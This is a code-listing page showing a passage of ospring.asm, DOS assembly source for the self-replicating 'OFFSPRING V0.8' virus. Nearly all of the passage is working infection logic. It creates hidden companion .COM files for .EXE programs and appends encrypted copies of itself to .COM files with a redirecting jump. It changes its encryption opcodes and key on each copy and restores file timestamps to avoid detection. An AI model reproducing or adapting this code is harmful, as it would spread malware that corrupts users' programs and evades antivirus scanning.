📄 ospring.asm
字号:
mov fname_off, offset fname1 ; Set search for *.EXE
mov word ptr mov_di,offset enc_data+2
find_first:
mov word ptr vend,0 ; Clear ff/fn buffer
lea si, vend
lea di, vend+2
mov cx, 22
cld
rep movsw
; Set DTA address - This is for the Findfirst/Findnext INT 21H functions
mov ah, 1ah
lea dx, vend
int 21h
mov ah, 4eh ; Findfirst
mov cx, 0 ; Set normal file attribute search
mov dx, fname_off
int 21h
jnc next_loop ; if still finding files then loop
jmp end_prog
next_loop :
cmp byte ptr vtype, parastic ; parastic infection?
je start_inf ; yes, skip all this
mov ah,47h
xor dl,dl
lea si,file_dir
int 21h
cmp word ptr vend[f_sizel],0 ; Make sure file isn't 64k+
je ok_find ; for spawning infections
jmp find_file
ok_find:
xor bx,bx
lm3 : ; find end of directory name
inc bx
cmp file_dir[bx],0
jne lm3
mov file_dir[bx],'\' ; append backslash to path
inc bx
mov cx,13 ; append filename to path
lea si,vend[f_name]
lea di,file_dir[bx]
cld
rep movsb
xor bx,bx
mov bx,1eh
loop_me: ; search for filename ext.
inc bx
cmp byte ptr vend[bx], '.'
jne loop_me
inc bx ; change it to COM
mov word ptr vend [bx],'OC'
mov byte ptr vend [bx+2],'M'
start_inf:
cmp byte ptr vtype, parastic ; parastic infection?
je parastic_inf ; yes.. so jump
;--------------------------------------
; Spawning infection
lea dx, vend[f_name]
mov ah, 3ch ; Create file
mov cx, 02h ; READ-ONLY
or cx, 01h ; Hidden
int 21h ; Call INT 21H
jnc contin ; If Error-probably already infected
jmp no_infect
contin:
inc inf_count
mov bx,ax
jmp encrypt_ops
;----------------------------------------
; Parastic infection
parastic_inf :
cmp word ptr vend+f_sizeh,400h
jge cont_inf2
jmp no_infect
cont_inf2:
lea si,vend+f_name ; Is Command.COM?
lea di,com_name
mov cx,11
cld
repe cmpsb
jne cont_inf0 ; Yes, don't infect
jmp no_infect
cont_inf0:
mov ax,3d02h ; Open file for reading & writing
lea dx,vend+f_name ; Filename in FF/FN buffer
int 21h
jnc cont_inf1 ; error, skip infection
jmp no_infect
cont_inf1:
mov bx,ax
mov ah,3fh ; Read first bytes of file
mov cx,04
lea dx,org_bytes
int 21h
cmp word ptr org_bytes,0e990h
jne cont_inf
mov ah,3eh
int 21h
jmp no_infect
cont_inf:
inc inf_count
mov ax,4202h ; Set pointer to end of file, so we
xor cx,cx ; can find the file size
xor dx,dx
int 21h
mov word ptr set_bp,ax ; Change the MOV BP inst.
add ax, offset enc_data+2
mov word ptr mov_di,ax ; chg mov di,xxxx
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
mov ax,word ptr vend+f_sizeh
sub ax,4
mov word ptr new_jmp+1,ax
mov ah,40h
mov cx,4
lea dx,new_code
int 21h
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
encrypt_ops:
;-----------------------------
; Change encryptions ops
push bx
cmp pad_bytes,50
je reset_pad
inc word ptr pad_bytes ; Increase file size
inc word ptr b_wr
jmp pad_ok
reset_pad:
mov ax,pad_bytes
sub word ptr b_wr,ax
xor ax,ax
mov pad_bytes,ax
pad_ok:
cmp inc_op,47h ; change ops from DI to SI
jne set2
dec inc_op
dec byte ptr xor_op+1
dec di_op
dec byte ptr enc_addr
dec byte ptr enc_add+1
jmp chg_three
set2:
inc inc_op
inc byte ptr xor_op+1
inc di_op
inc byte ptr enc_addr
inc byte ptr enc_add+1
chg_three:
mov ah,inc_op
xor cx,cx
lea di,sw_byte3
chg_four:
xor bx,bx ; Switch INC xx's location
cmp word ptr [di],9090h
je mov_pos
inc bx
inc bx
cmp byte ptr [di+1],90h ; is second byte not 90h
je mov_pos
dec bx
mov_pos: mov word ptr [di],9090h ; set all three bytes (of 3rd)
mov byte ptr [di+2],90h ; to NOP
mov byte ptr [di+bx],ah ; place inc xx in other byte
lea di,sw_byte4
inc cx
cmp cx,1
je chg_four
;-----------------------
; Get random XOR number, save it, copy virus, encrypt code
d2:
mov ah,2ch ;
int 21h ; Get random number from clock - millisecs
mov word ptr xor_op+2,dx ; save encryption #
mov si,0100h
lea di,vend+50 ; destination
mov cx,offset vend-100h ; bytes to move
cld
rep movsb ; copy virus outside of code
enc_addr:
mov di,offset vend
enc_add:
add di,offset enc_data-100h+52 ; offset of new copy of virus
go_enc:
mov byte ptr ret_byte,0c3h
call encrypt ; encrypt new copy of virus
mov byte ptr ret_byte,90h
;----------------------------------------
; Write and close new infected file
pop bx
mov cx, offset vend-100h ; # of bytes to write
add cx, pad_bytes
lea dx, vend+50 ; Offset of buffer
mov ah, 40h ; -- our program in memory
int 21h ; Call INT 21H function 40h
mov ax,5701h ; Restore data/time
mov cx,word ptr vend[f_time]
mov dx,word ptr vend[f_date]
int 21h
close:
mov ah, 3eh
int 21h
no_infect:
; Find next file
find_file :
cmp inf_count, max_inf
je end_prog
mov ah,4fh
int 21h
jc end_prog
jmp next_loop
end_prog:
exit :
cmp inf_count,0 ; Start parastic infection on next run
jne find_done
cmp byte ptr vtype, parastic ; Parastic infection done?
je find_done
mov fname_off, offset fname2 ; Point to new filespec
mov byte ptr vtype, parastic ; virus type = parastic
jmp find_first
find_done:
mov byte ptr vtype,spawn
mov fname_off, offset fname1
ret
resident endp
vtype db spawn ; Infection type
rot_num dw 0000 ; Used when replacing bytes with OP_SET
inf_count db 0 ; How many files we have infected this run
com_name db 'COMMAND.COM' ; obvious
new_code db 90h
new_jmp db 0e9h,00,00 ; New Jump
org_bytes db 5 dup(0) ; original first five bytes of parastic inf.
pad_bytes dw 0 ; Increase in viru size
add_mem db 0 ; Add memory back?
old_dta dd 0 ; Old DTA Segment:Address
inc_op db 47h ; INC DI (47h) or INC SI (46h)
copyr db '(c)1993 negoriV' ; my copyright
vname db 0ah,0dh,'OFFSPRING V0.8','$'
fname1 db '*.EXE',0 ; Filespec
fname2 db '*.COM',0 ; Filespec
fname_off dw fname1 ; Offset of Filespec to use
times_inc db 0 ; # of times encryption call incremented
sl db '\' ; Backslash for directory name
file_dir db 64 dup(0) ; directory of file we infected
file_name db 13 dup(0) ; filename of file we infected
par_blk dw 0 ; command line count byte -psp
par_cmd dw 0080h ; Point to the command line -psp
par_seg dw 0 ; seg
dw 05ch ; Use default FCB's in psp to save space
par1 dw 0 ;
dw 06ch ; FCB #2
par2 dw 0 ;
vend: ; End of virus
cseg ends
end start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -